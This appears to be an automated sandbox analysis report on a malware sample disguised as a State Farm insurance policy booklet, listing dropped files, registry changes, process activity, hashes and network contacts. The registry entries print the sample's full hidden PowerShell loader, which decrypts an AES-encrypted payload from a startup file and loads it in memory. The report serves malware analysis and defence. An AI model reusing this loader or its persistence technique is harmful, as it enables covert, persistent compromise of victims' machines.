Analysis Overview
SHA256
02257b487a0c8a927a63e82adef0d9fafef53bac3bafbb98f417a5cbc3a9d6c0
Threat Level: Likely malicious
The file State-Farm-Auto-Insurance-Policy-Booklet.exe.zip was found to be: Likely malicious.
Malicious Activity Summary
Executes dropped EXE
Drops startup file
Checks computer location settings
Enumerates physical storage devices
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-06-10 17:30
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-06-10 17:29
Reported
2022-06-10 17:33
Platform
win7-20220414-en
Max time kernel
114s
Max time network
43s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Plevin.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SXuGZcKhlvoTHGcRbriizwmgfiNLw.zZAHomszxsi | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg\shell\open\command | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg\shell | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg\shell\open | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg\shell\open\command\ = "powershell -windowstyle hidden -command \"$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('SjQDQJXpF0XycaMaRqevDN2rb/N/xhU/qpHAQAoW3lk=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText([System.Text.Encoding]::Utf8.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcQWRtaW5cQXBwRGF0YVxSb2FtaW5nXE1pY3Jvc29mdFxXaW5kb3dzXFN0YXJ0IE1lbnVcUHJvZ3JhbXNcU3RhcnR1cFxTWHVHWmNLaGx2b1RIR2NSYnJpaXp3bWdmaU5Mdy56WkFIb21zenhzaQ=='))));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[Q3L_Glan_Vtc1CPJQkQ70yXjuL3TzE3TZiJsfOSs5gAmyjm5oU53X8JV6OwMDTyztRqYI6.sw9snxC2eLnjjajXWtqtVxBDr52u5]::QfDGsg3D06Lqj7gwQVoPIisR72G4p2enJJGE9();\"" | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\.zzahomszxsi | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\.zzahomszxsi\ = "yvlobsgsdlyfg" | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe
"C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe"
C:\Users\Admin\AppData\Local\Temp\Plevin.exe
"C:\Users\Admin\AppData\Local\Temp\Plevin.exe"
C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe
"C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe" /s
Network
Files
memory/2016-54-0x0000000000A80000-0x0000000000D14000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Plevin.exe
| MD5 | dbc534854dd385e59a3f1906ddfb9020 |
| SHA1 | 2b3062d82232ce10a8713829199769ff0d12e0fc |
| SHA256 | 06486febb76aaa7bf469ba1bf46a92c4eafc42a5626646184e8865c862d09dd0 |
| SHA512 | 1506fbc8fca0a3ca06e24fdae2fb9e8cb345fd6197f5cbbaa990490cc20a25b72906ab9668725f29c0bfce6528bd7dca5dc15ca0ac3c0327d1876e58e3d47951 |
memory/1616-55-0x0000000000000000-mapping.dmp
memory/1616-57-0x0000000075191000-0x0000000075193000-memory.dmp
memory/1360-58-0x0000000000000000-mapping.dmp
memory/1360-59-0x000000001B920000-0x000000001BC02000-memory.dmp
memory/1360-60-0x00000000003D0000-0x00000000003EC000-memory.dmp
memory/1360-61-0x0000000000400000-0x0000000000448000-memory.dmp
memory/1360-62-0x00000000001D0000-0x00000000001D8000-memory.dmp
memory/1360-63-0x0000000002120000-0x00000000021C6000-memory.dmp
memory/1360-64-0x00000000009F0000-0x0000000000A24000-memory.dmp
memory/1360-65-0x0000000000A30000-0x0000000000A7A000-memory.dmp
memory/1360-66-0x0000000000530000-0x0000000000546000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-06-10 17:29
Reported
2022-06-10 17:33
Platform
win10v2004-20220414-en
Max time kernel
106s
Max time network
151s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Plevin.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ISVTiCXTiQbcXcwgXUSwts.HIkwAElPUyfMKdNZZlMsAnLapQSLeWV | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\xjeunwqrnedfhcfuamca | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\xjeunwqrnedfhcfuamca\shell | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\xjeunwqrnedfhcfuamca\shell\open | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\xjeunwqrnedfhcfuamca\shell\open\command\ = "powershell -windowstyle hidden -command \"$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('SjQDQJXpF0XycaMaRqevDN2rb/N/xhU/qpHAQAoW3lk=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText([System.Text.Encoding]::Utf8.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcQWRtaW5cQXBwRGF0YVxSb2FtaW5nXE1pY3Jvc29mdFxXaW5kb3dzXFN0YXJ0IE1lbnVcUHJvZ3JhbXNcU3RhcnR1cFxJU1ZUaUNYVGlRYmNYY3dnWFVTd3RzLkhJa3dBRWxQVXlmTUtkTlpabE1zQW5MYXBRU0xlV1Y='))));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[Q3L_Glan_Vtc1CPJQkQ70yXjuL3TzE3TZiJsfOSs5gAmyjm5oU53X8JV6OwMDTyztRqYI6.sw9snxC2eLnjjajXWtqtVxBDr52u5]::QfDGsg3D06Lqj7gwQVoPIisR72G4p2enJJGE9();\"" | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\.hikwaelpuyfmkdnzzlmsanlapqslewv | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\.hikwaelpuyfmkdnzzlmsanlapqslewv\ = "xjeunwqrnedfhcfuamca" | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\xjeunwqrnedfhcfuamca\shell\open\command | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3800 wrote to memory of 4244 | N/A | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | C:\Users\Admin\AppData\Local\Temp\Plevin.exe |
| PID 3800 wrote to memory of 4244 | N/A | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | C:\Users\Admin\AppData\Local\Temp\Plevin.exe |
| PID 3800 wrote to memory of 4244 | N/A | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | C:\Users\Admin\AppData\Local\Temp\Plevin.exe |
| PID 3800 wrote to memory of 544 | N/A | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe |
| PID 3800 wrote to memory of 544 | N/A | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe
"C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe"
C:\Users\Admin\AppData\Local\Temp\Plevin.exe
"C:\Users\Admin\AppData\Local\Temp\Plevin.exe"
C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe
"C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe" /s
Network
| Country | Destination | Domain | Proto |
| US | 209.197.3.8:80 | tcp | |
| NL | 104.110.191.133:80 | tcp | |
| NL | 104.110.191.133:80 | tcp | |
| US | 52.168.112.66:443 | tcp | |
| US | 8.8.8.8:53 | 14.110.152.52.in-addr.arpa | udp |
| US | 209.197.3.8:80 | tcp | |
| CH | 146.70.71.174:80 | 146.70.71.174 | tcp |
| NL | 2.17.222.14:80 | tcp |
Files
memory/3800-130-0x000001B4CEDC0000-0x000001B4CF054000-memory.dmp
memory/3800-131-0x00007FFE12440000-0x00007FFE12F01000-memory.dmp
memory/3800-132-0x00007FFE12440000-0x00007FFE12F01000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Plevin.exe
| MD5 | dbc534854dd385e59a3f1906ddfb9020 |
| SHA1 | 2b3062d82232ce10a8713829199769ff0d12e0fc |
| SHA256 | 06486febb76aaa7bf469ba1bf46a92c4eafc42a5626646184e8865c862d09dd0 |
| SHA512 | 1506fbc8fca0a3ca06e24fdae2fb9e8cb345fd6197f5cbbaa990490cc20a25b72906ab9668725f29c0bfce6528bd7dca5dc15ca0ac3c0327d1876e58e3d47951 |
memory/4244-133-0x0000000000000000-mapping.dmp
memory/544-135-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\State-Farm-Auto-Insurance-Policy-Booklet.exe.log
| MD5 | fff5cbccb6b31b40f834b8f4778a779a |
| SHA1 | 899ed0377e89f1ed434cfeecc5bc0163ebdf0454 |
| SHA256 | b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76 |
| SHA512 | 1a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9 |
memory/3800-138-0x00007FFE12440000-0x00007FFE12F01000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Plevin.exe
| MD5 | dbc534854dd385e59a3f1906ddfb9020 |
| SHA1 | 2b3062d82232ce10a8713829199769ff0d12e0fc |
| SHA256 | 06486febb76aaa7bf469ba1bf46a92c4eafc42a5626646184e8865c862d09dd0 |
| SHA512 | 1506fbc8fca0a3ca06e24fdae2fb9e8cb345fd6197f5cbbaa990490cc20a25b72906ab9668725f29c0bfce6528bd7dca5dc15ca0ac3c0327d1876e58e3d47951 |
memory/544-139-0x00007FFE12440000-0x00007FFE12F01000-memory.dmp
memory/544-140-0x00007FFE12440000-0x00007FFE12F01000-memory.dmp
memory/544-141-0x000001B670240000-0x000001B670262000-memory.dmp